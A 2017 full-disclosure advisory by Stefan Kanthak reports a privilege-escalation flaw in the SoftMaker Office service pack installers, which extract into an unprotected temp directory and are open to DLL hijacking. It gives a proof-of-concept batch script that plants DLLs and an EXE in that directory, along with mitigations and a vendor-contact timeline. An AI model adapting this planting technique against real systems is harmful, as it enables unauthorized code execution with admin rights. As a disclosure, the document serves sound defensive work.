SoftMaker Office 201x Privilege Escalation
Posted on 04 January 2017
Hi @ll, the service pack installers for SoftMaker Office 201x, available from <http://www.softmaker.com/en/servicepacks-office-windows>, are (surprise.-) vulnerable. The executable installer (OUCH) ofw16_763.exe, a 7z SFX (OUCH), creates an UNPROTECTED directory "%TEMP%7zSxxxxxxxx" to extract its payload, then executes "%TEMP%7zSxxxxxxxxspsetup.exe". "%TEMP%7zSxxxxxxxx" inherits the NTFS access rights of its parent "%TEMP%", i.e. allows full access for the UNPRIVILEGED user. For this well-known vulnerability see <https://cwe.mitre.org/data/definitions/377.html> and <https://cwe.mitre.org/data/definitions/379.html> Due to the embedded application manifest which specifies "requireAdministrator" the executable installer can only be run with administrative rights. JFTR: if written properly, it would create a PROTECTED directory "%TEMP%7zSxxxxxxxx", writable only for privileged users! The UNPRIVILEGED user as well as any program running with the users credentials can modify the extracted files, for example "%TEMP%7zSxxxxxxxxspsetup.exe", which is executed with administrative rights, resulting in arbitrary code execution with elevation of privilege. Additionally "spsetup.exe" is vulnerable to DLL hijacking, another well-known vulnerability. See <https://capec.mitre.org/data/definitions/471.html>, <https://cwe.mitre.org/data/definitions/426.html>, <https://cwe.mitre.org/data/definitions/427.html> <https://technet.microsoft.com/en-us/library/2269637.aspx>, <https://msdn.microsoft.com/en-us/library/ff919712.aspx> and <https://msdn.microsoft.com/en-us/library/ms682586.aspx> plus <http://blogs.technet.com/b/srd/archive/2014/05/13/load-library-safely.aspx> Thanks to the unprotected directory "%TEMP%7zSxxxxxxxx" the unprivileged user can write DLLs to "%TEMP%7zSxxxxxxxx" which are loaded by "spsetup.exe", again resulting in arbitrary code execution with elevation of privilege! Proof-of-concept: ~~~~~~~~~~~~~~~~~ 0. download <http://www.softmaker.net/down/ofw16_763.exe> and save it in an arbitrary directory; 1. download <http://home.arcor.de/skanthak/download/SENTINEL.DLL> (see <http://home.arcor.de/skanthak/sentinel.html> alias <https://skanthak.homepage.t-online.de/sentinel.html>) and save it in an(other) arbitrary directory; 2. save the following batch script in same the directory as SENTINEL.DLL: --- OFW16_873.CMD --- :WAIT @If Not Exist "%TEMP%7z*" Goto :WAIT For /D %%! In ("%TEMP%7z*") Do Set foobar=%%! Copy "SENTINEL.DLL" "%foobar%NTMARTA.DLL" Copy "SENTINEL.DLL" "%foobar%VERSION.DLL" Copy "SENTINEL.DLL" "%foobar%WINSPOOL.DRV" --- EOF --- 3. start the batch script; 4. execute ofw16_873.exe and notice the message boxes displayed by SENTINEL.DLL. PWNED! 5. download <http://home.arcor.de/skanthak/download/SENTINEL.EXE> to the same directory as the batch script; 6. in the batch script replace the 3 lines Copy ... with Copy "SENTINEL.EXE" "%foobar%spsetup.exe" 7. start the batch script; 8. execute ofw16_873.exe and notice the message box displayed by SENTINEL.EXE. PWNED! Mitigations: ~~~~~~~~~~~~ * Don't use executable installers! NEVER! Don't use self-extractors! NEVER! See <http://seclists.org/fulldisclosure/2015/Nov/101> and <http://seclists.org/fulldisclosure/2015/Dec/86> plus <http://home.arcor.de/skanthak/!execute.html> alias <https://skanthak.homepage.t-online.de/!execute.html> for more information. * Practice STRICT privilege separation: NEVER use the so-called "protected" administrator account(s) created during Windows setup which use the same "%TEMP%" for unprivileged and privileged processes! * Add an ACE "(D;OIIO;WP;;;WD)" to the ACL of every "%USERPROFILE%"; use <https://msdn.microsoft.com/en-us/library/aa374928.aspx> to decode it to "deny execution of files in this directory for everyone, inheritable to all files in all subdirectories". stay tuned Stefan Kanthak Timeline: ~~~~~~~~~ 2016-12-15 sent vulnerability report to vendor no reply, not even an acknowledegement of receipt 2016-12-23 resent vulnerability report to vendor, cc CERT at german BSI no reply, not even an acknowledegement of receipt 2016-12-27 CERT at german BSI contacts vendor offering help no reply, not even an acknowledegement of receipt 2016-12-31 report published
